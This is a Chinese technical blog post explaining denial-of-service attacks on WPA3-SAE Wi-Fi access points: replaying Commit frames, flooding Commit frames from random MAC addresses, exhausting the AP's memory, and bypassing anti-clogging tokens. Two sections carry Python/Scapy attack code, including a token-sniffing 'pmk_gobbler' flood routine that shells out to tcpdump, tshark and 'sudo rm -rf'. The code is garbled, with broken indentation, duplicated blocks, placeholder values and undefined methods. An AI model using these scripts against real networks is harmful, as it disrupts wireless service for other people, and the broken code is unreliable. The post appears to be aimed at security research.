WPA3-SAE中的Dos攻击(一)

最新推荐文章于 2024-06-03 10:58:35 发布
最新推荐文章于 2024-06-03 10:58:35 发布
阅读量576 收藏 2
点赞数 3
文章标签: 网络攻击模型 安全威胁分析 计算机网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kerberos333/article/details/131253208
版权

       早在WPA3诞生之初,WPA3就面临着SAE握手开销较大的困扰。攻击者可以利用这一漏洞通过耗尽AP资源的方式实现拒绝服务攻击,尽管Wi-Fi联盟提出了诸如防阻塞机制和使用缓存表等方式来减少这一漏洞带来的威胁。但时至今日,这一问题依然没有得到彻底解决,攻击者依然可以利用SAE握手高开销的漏洞实现拒绝服务攻击。本节主要介绍通过耗尽资源的方式实现的拒绝服务攻击。这种攻击方式的主要思想是利用SAE握手开销大的特性,不断的发送Commit请求帧给AP,使得AP因为构造回复帧而大量消耗资源,进而导致拒绝服务攻击。下面我们就具体的对这种攻击进行详细讲解。

       

一、Commit请求帧重放攻击

Commit请求帧重放攻击,使用设置监听模式的无线网卡以及抓包工具对目标AP进行监听,在监听中抓取合法的Commit请求帧并通过脚本进行大量的重放。这些攻击包完全是基于合法Commit请求帧的重放,所有攻击包的内容与合法Commit请求帧完全一致。这一行为会导致目标AP为计算密钥元素P和构造Commit回复帧而消耗大量资源,进而造成拒绝服务攻击。

 

二、Commit请求帧构造攻击

使用随机MAC的Commit请求帧攻击的基本原理是利用编程技术使用随机产生的MAC地址加合法的Scalar、Group、Finite(Scalar、Group、Finite必须使用合法的而不是随机生成的,这是因为认证双方会经过简单可行的检测后抛弃所有不在椭圆曲线上的值)等参数不断构造新的Commit请求帧并发送给AP,这使得AP无法在自身的缓存表中找到相应的Commit回复帧信息,只能不断的计算新的密钥元素P并构造Commit回复帧以进行回复,进而大量消耗资源造成拒绝服务攻击。

#随机生成MAC地址
def rand_mac():
    return '%02x:%02x:%02x:%02x:%02x:%02x'%(
         random.randint(0,255), random.randint(0,255),
         random.randint(0,255), random.randint(0,255),
         random.randint(0,255), random.randint(0,255)
     )
#常用组19
group = '\x13\x00'

confirm = 'valid_confirm'
#从列表中随机选取Scalar
def scalar():
    scalar=['list of scalar']
    return random.choice(scalar)
Scalar=scalar()
#从列表中随机选取Finite
def finite():
    finite=['list of finite']
    return random.choice(finite)
Finite=finite()
#创建含有大量含有随机MAC的txt文件
def create_mac_file(count, filename):
    os.system('sudo rm -rf "%s"' % filename)
    for n in range(int(count)):
        mac = '%02x:%02x:%02x:%02x:%02x:%02x' % (random.randint(0, 255), random.randint(0, 255),random.randint(0, 255), random.randint(0,255),random.randint(0, 255), random.randint(0,255))
        with open(filename, 'a') as fs:
            fs.write(str(mac))
            fs.write('\n')
            fs.close()
    global f
    f =open(filename, 'r')
    os.system('sudo chmod 777 -R "%s" ' % filename)

    # 根据AP的BSSID和文件中的MAC地址创建Commit帧
    def auth_frame_fromfile(self):
        client = f.readline()
        return RadioTap() / Dot11(type=0, subtype=11, addr1=bssid, addr2=client, addr3=bssid) / Dot11Auth(algo=3,seqnum=1,status=0)

# 使用特定源地址构建Commit帧认证头
def Auth_commit(mac):
return RadioTap() / Dot11(type=0, subtype=11, addr1=bssid, addr2= mac, addr3=bssid) / Dot11Auth(algo=3,seqnum=1,status=0)

def commmit_attack(self):
    for i in range(int(count)):
#使用随机MAC地址构建Commit帧并发送
        random_commit = Auth_commit(Random_MAC) / group / Scalar / Finite
        sendp(random_commit, inter=0.00001, count=5, iface="%s" % iface)

三、内存溢出攻击

内存溢出攻击是一种针对AP的缓存表机制进行的攻击。这种攻击通过不断的、低频率的、在不触发防阻塞机制的情况下向AP发送Commit请求帧,并希望以此来耗尽AP的内存。这可能会导致AP进入以下两种状态:

(1)起初,AP会正常的接收Commit请求帧,计算生成Commit回复帧,并将它们存入内存。当有新的Commit请求帧出现时,AP会在内存中执行查找操作,以获取Scalar、Finite等相关参数。这个状态通常被称为“允许重用先前的密钥元素P”.

(2)当攻击进行一段时间后AP会进入第二种状态,在这个状态中,内存已满,AP无法为新的参数分配内存。在这种状态下,AP会继续生成新的Scalar、Finite等相关参数,并尝试构造Commit回复帧进行回复。但是由于内存不足,AP无法进行回复,或者回复后由于内存不足无法存储安全关联SA,进而造成拒绝服务攻击。[9]

此外,为了提高攻击成功的概率,尽最大可能的消耗目标AP的资源,攻击者可以构造Commit请求帧会使用不同的Group参数,当STA变化Group时,AP都会删除之前绑定到该源MAC地址的SAE协议实例,它需要重新计算密钥元素P、Scalar、Finite和PMK。

四、应对防阻塞机制的攻击

由于防阻塞机制的出现,攻击手段也相应的进行了升级,产生了一种应对防阻塞机制的攻击方式。这种攻击的基本原理是:

攻击者首先使用随机的MAC地址构造大量的Commit请求帧发送给目标AP,当AP接收到的来自不同MAC地址的Commit请求帧数量超过阈值时就会触发AP的防阻塞机制。AP会以防阻塞令牌的方式进行回复。这时攻击者使用具有监听功能的无线设备将防阻塞令牌截获,并按照AP的要求在重新构造的Commit请求帧中重复防阻塞令牌发送给目标AP。此时,AP会检验攻击者重新构造的Commit请求帧,通过检验后,AP会计算Commit回复帧进行回应。这种攻击模仿合法的STA回应了防阻塞机制,并使一部分攻击包能够到达AP。

 

#从列表中随机选取Scalar
def scalar():
    scalar=['list of scalar']
    return random.choice(scalar)
Scalar=scalar()
#从列表中随机选取Finite
def finite():
    finite=['list of finite']
    return random.choice(finite)
Finite=finite()
#创建含有大量含有随机MAC的txt文件
def create_mac_file(count, filename):
    os.system('sudo rm -rf "%s"' % filename)
    for n in range(int(count)):
        mac = '%02x:%02x:%02x:%02x:%02x:%02x' % (random.randint(0, 255), random.randint(0, 255),random.randint(0, 255), random.randint(0,255),random.randint(0, 255), random.randint(0,255))
        with open(filename, 'a') as fs:
            fs.write(str(mac))
            fs.write('\n')
            fs.close()
    global f
    f =open(filename, 'r')
    os.system('sudo chmod 777 -R "%s" ' % filename)

    # 根据AP的BSSID和文件中的MAC地址创建Commit帧
    def auth_frame_fromfile(self):
        client = f.readline()
        return RadioTap() / Dot11(type=0, subtype=11, addr1=bssid, addr2=client, addr3=bssid) / Dot11Auth(algo=3,seqnum=1,status=0)

# 使用特定源地址构建Commit帧认证头
def Auth_commit(mac):
return RadioTap() / Dot11(type=0, subtype=11, addr1=bssid, addr2= mac, addr3=bssid) / Dot11Auth(algo=3,seqnum=1,status=0)

# 使用特定源地址构建Confirm帧认证头
  def Auth_confirm(mac):
return RadioTap() / Dot11(type=0, subtype=11, addr1=bssid, addr2= mac, addr3=bssid) / Dot11Auth(algo=3,seqnum=1,status=0)

    # 使用特定的MAC地址和对应的防阻塞令牌构建Commit请求帧
    def construct_token(self,token, mac):
        Auth = self.auth_frame_mac(mac)
        return Auth / group / token / Scalar / Finite
def pmk_gobbler(self):
#创建一个含有大量随机MAC地址的文件
    create_mac_file(count, filename)
    for p in range(500):
        start = True
        # 创建一个新的pcap文件以便检索防阻塞令牌
        os.system('sudo rm -rf ' + filename_pcap)
        os.system('sudo cp template.pcap ' + filename_pcap)
        # 发送Commit帧并监听防阻塞令牌
        for n in range(int(count)):
            if start == True:
                if os.path.isfile(filename_pcap) == True:
                    os.system('sudo rm -rf ' + filename_pcap)
                    # 开始监听认证帧并提取源MAC地址
                    listener = subprocess.Popen(['sudo tcpdump -i "%s" -w "%s" -e -s 0 type mgt subtype auth and wlan src "%s" ' % (iface,filename_pcap, bssid)], stdout=subprocess.PIPE, shell=True)
                    start = False
#按照创建文件中的MAC地址开始发送Commit帧
            sendp(self.construct_fromfile(), inter=0.0001, iface="%s" % iface )
        #从监听得到的包中检索防阻塞令牌并开始攻击
        with open(filename) as k:
            for mac in k:
                start = True
# 获取文件中MAC地址对应的防阻塞令牌
                add_argument = 'DA ==' + mac
                process = subprocess.Popen('sudo tshark -r "%s" -Y "%s" -T fields -e wlan.fixed.anti_clogging_token' % (filename_pcap, add_argument), stdout=subprocess.PIPE, shell=True)
                process.wait()
                # 对字段进行裁剪只提取防阻塞令牌
                anti_token = process.communicate()[0]                
# 发送带有防阻塞令牌的Commit帧
                if not anti_token == ' ':
                    try:
                 sendp(self.construct_token(bytes.fromhex(anti_token), mac), inter=0.000001, count=10,iface="%s" % iface)
                    except Exception as e:
                        print('Error: ' + str(e))
            listener.terminate()
        #完成一轮攻击

kerberos333
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
sae wpa3加密方式_WPA3-SAE 身份验证
weixin_39583623的博客
12-30 3565
WPA3-SAE 身份验证WPA3-SAE authentication02/21/2019本文内容WPA3 SAE (也称为 WPA3)在具有 WDI 版本1.1.8 和更高版本的 Windows 受支持。WPA3-SAE, also known as WPA3-Personal, is supported in Windows with WDI version 1.1.8 and later...
WPA3-SAE_Test_Plan_v1.3.pdf
12-19
WPA3 认证文档
四种Wi-Fi安全协议:WEP、WPA、WPA2、WPA3,看完秒懂!
网络技术联盟站
04-28 2355
Wi-Fi安全协议密钥管理方法加密长度使用的协议WEP静态密钥64位或128位WPA动态密钥128位WPA2动态密钥128位或256位使用CCMP(Counter Mode with Cipher Block Chaining Message Authentication Code Protocol)的AES(高级加密标准)WPA3动态密钥(唯一密钥,个性化数据加密)192位和256位使用SAE(同时身份验证)的GCM(Galois-Counter Mode)
网络安全】DDoS攻击详解
最新发布
abao6690的博客
06-03 922
网络安全】DDoS攻击详解
WIFI连接之WPA3-SAE介绍
szqy00的博客
08-28 2894
连接设备选择安全组参数(Group Formation):连接设备收到AP广播的公开参数后,会选择最适合自己的一个安全组参数(例如密码),并生成一个临时的Diffie-Hellman公私钥对。无线访问点公开参数广播(AP广播):无线访问点(AP)会广播一些公开参数,包括一个组公开参数元素(GPK),用于向连接的设备提供一些安全相关的信息。响应(Probe Response):WiFi接入点回复客户端设备的请求,并传输网络的基本信息,包括WiFi名称(SSID)和支持的加密方式。
WPA2-PSK的取代者:WPA3-SAE
kerberos333的博客
06-08 4053
WPA3是Wi-Fi联盟推出用于取代WPA2的第四代通信加密技术。WPA3通过引入SAE握手协议增加了字典法暴力破解的难度和提供前向保密,相较于WPA2的安全性有很大的提升。
WPA2-PSK的取代者:WPA3-SAE_wpa3 sae网络安全端简单易用的SPI框架
2401_84103818的博客
04-04 835
生成的密钥元素P将用于下一步 Commit阶段某些关键信息的生成。假设交互双方分别为Alice和Bob,SAE交互过程如图2-2所示。图2-2 SAE交互过程二、 Commit(提交)阶段在SAE握手,认证请求可以被参与交互的任何一方主动发起。但在实际的无线网络交互过程,通常由STA发起认证请求。以Alice与Bob之间的交互为例,Alice发出认证请求,并使用一个随机数rA∈[2,q-1]和随机生成的掩码mA∈[2,q-1]生成SA标量和EA元素。生成过程如下:SA*)*mod q。
WPA2-PSK的取代者:WPA3-SAE_wpa3 sae(1),字节大神强推千页PDF学习笔记
m0_59117112的博客
04-15 1125
如果将这个x坐标输入椭圆曲线方程后检查y值在方程是否存在有效解(点(x,y)满足方程且在椭圆曲线上生成一个有效的点)并且增量计数器Counter大于40(为了抵御侧信道攻击与定时攻击),则密钥元素P为(x,y)。交互双方分别计算出密钥点K后,Alice将密钥点K对应的x坐标经过哈希运算后得到密钥κ,同时通过SA、SB、EA、EB计算握手概要值tr,Alice使用密钥κ对trA进行哈希变换生成cA,并通过一个Confirm帧(如图2-4所示)发送给Bob进行验证。Alice验证通过后,双方计算出密钥点K。
wpa3-sae 空口抓包分析
04-29
基于wpa3 空口omnipeek抓包,详细分析wpa3 认证,关联,握手流程
WPA3-SAE安全测试系统
06-10
这是一个使用Python编写的,运行在Kali Linux系统安全测试软件,主要用于对WPA3-SAE进行安全研究。它可以实现WPA3除去密钥组降级攻击以及侧信道攻击外所有的攻击。这种工具测试软件为全新设计,全网只此一份。...
WPA3认证分析.pdf
01-12
- **WPA3-SAE Mode**:不支持WPA,仅支持SAE认证,这是一种基于密码学证明的直接认证方法,提高了密钥协商的安全性。 - **WPA3-SAE Transition Mode**:在向WPA3过渡期间,同时支持WPA2-PSK和SAE,允许旧设备与新...
WPA-Attack:WPA 攻击 - 通过键入一个命令轻松破坏 WPA WPA2 网络
05-30
您要做的就是键入以下命令: ./WPA-Attack -b [BSSID] -c [CHANNEL] -w [WORDLIST_FILE]选项说明: [BSSID] 是目标的 MAC 地址[CHANNEL]是网络频道[WORDLIST_FILE] 是一个包含你想用来破解密码的字典的文件可选参数...
Wifi 认证,关联,四次握手(WPA/WPA2/WPA3-SAE
少歌的博客
03-20 1万+
SAE 采用了“互联网工程任务组(IETF)”RFC7664 规范定义的 “蜻蜓(Dragonfly)” 握手协议,将其应用于 Wi-Fi 网络以进行基于密码的身份验证。SAE 采用了“互联网工程任务组(IETF)”RFC7664 规范定义的 “蜻蜓(Dragonfly)” 握手协议,将其应用于 Wi-Fi 网络以进行基于密码的身份验证。站在用户的角度,设备连接这两种协议(WPA2-personal 和 WPA3-SAE)的热点没有任何操作上的区别。其 四次 eapol key 属于四次握手的过程。
[高通SDM450][Android9.0]设备默认支持连接WPA3-SAE加密协议的WIFI
小小码农
09-07 2557
前段时间,有个医院的客户反馈我们的设备无法连接上他们医院路由器的WIFI,并且设备显示wifi已保存,但就是连接不上。而且,连接手机的热点却是能正常连接并且能够上网的。
WPA3---SAE原理介绍
热门推荐
weixin_43408952的博客
10-14 5万+
WPA3简介 WIFI联盟2018.4月发布WPA3 V1.0版本,详细参见WIFI联盟官网 https://www.wi-fi.org/zh-hans/discover-wi-fi/security 背景:2017年10月份,有安全研究者公布了WPA2协议的一个弱点,会遭受到KRACK( Key Reinstallation AttaCK)攻击;攻击者可以获取STA和AP之间传输的数据,许多厂家...
wifi连接WPA3加密介绍
szqy00的博客
08-24 1129
WPA3是一项非常重要的无线网络安全改进,旨在提供更强大的加密和更好的网络安全性。它采用先进的密码学算法,增加了密码破解的难度,并提供了更高级别的数据隐私和保护,以确保无线网络的安全性和用户隐私。这增加了数据的隐私和安全性,因为即使攻击者成功解密了一个设备的流量,他们无法轻松地解密其他设备的流量。它是WPA2的继任者,旨在提供更强大的安全性和更好的保护,以满足不断增加的网络威胁。5、192位加密密钥:WPA3支持192位的加密密钥,相对于WPA2的128位密钥,提供了更高级别的安全性。
802.11协议wifi新加密方式WPA3介绍
头铁的伦的博客
12-04 1万+
当今的wifi安全问题 802.11任务组于2001年开始应用wpa2。当是还没有wifi并且802.11的应用也不像今天一样普遍。这是技术上的第一大步并且wifi以网卡几口的方式嵌入笔记本电脑上。此外,AP是一种单独的设备具有小巧,无法进行复杂运算的设备。 802.11i标准于2004年批准共享秘钥和eap三方server作为加密方式。 当802.11i协议尘埃落定,wifi启用wpa2规则...
WPA3也不安全啦?WPA3-R3 H2E了解一下
bingyu的博客
03-31 3418
WPA3也不安全啦?WPA3-R3 H2E了解一下 一、背景 借用权威大佬的一句话,这一切都是妥协。 WPA2方法被称为Wi-Fi最先进的加密协议从2004年到2018年整整14个年头,但是这期间被各种花样攻击,各种被攻破。终于在2018年联盟推出了WPA3加密协议,协议一推出,各大媒体争相报道,被称为史上最安全的加密协议,一时间风头无二。谁料想,打脸来得很快,一年的时间里就被爆出存在缺陷,攻击方法还被挂在亚马逊网站上公开售卖。 不得已,2020年12月,Wi-Fi联盟推出了被称为WPA3 R3版本,其
一文了解无线安全协议:WEP、WPA、WPA2 和 WPA3,吹牛逼有货了!
网络技术联盟站
08-22 2348
虽然其一些流量本身是加密的,但是有仍然是严重的风险。WPA3目前来说是非常安全的,并且已经支持WIFI6,只要支持WIFI6的设备基本上都支持WPA3,在不久的未来,无线安全协议就是WPA3的天下!在无线安全,无线密码只是最基本的加密办法,选择适当的加密级别才是最重要的,正确的选择将决定无线 LAN 是稻草屋还是坚韧的堡垒。WPA2对于家庭网络很实用,但它对企业网络很脆弱,因为,攻击者可以访问使用 WPA2 保护的网络,访问网络后,他们可以访问密码,,使用此协议,它将使用一种安全的方式,即平等握手的。
WPA3_SAE_WPA3_SAE
04-27
WPA3-SAE(Simultaneous Authentication of Equals)是Wi-Fi Protected Access 3的一种认证方法。它是Wi-Fi联盟于2018年推出的一种更加安全的Wi-Fi认证协议,旨在提供更强大的保护机制来防止Wi-Fi网络的攻击。 WPA3-SAE采用了更强大的密码学算法和认证机制,以提供更高的安全性。它引入了Simultaneous Authentication of Equals(SAE)协议,该协议基于密码学的Diffie-Hellman密钥交换算法,允许设备在进行连接时进行相互身份验证。 SAE协议通过使用密码学技术,确保只有拥有正确密码的设备才能成功连接到Wi-Fi网络。与之前的WPA2-PSK(Pre-Shared Key)相比,WPA3-SAE提供了更强大的保护机制,可以有效地防止常见的密码破解攻击。 总结一下,WPA3-SAE是一种更加安全的Wi-Fi认证协议,它采用了Simultaneous Authentication of Equals(SAE)协议来提供更高的安全性和保护机制。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

kerberos333

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值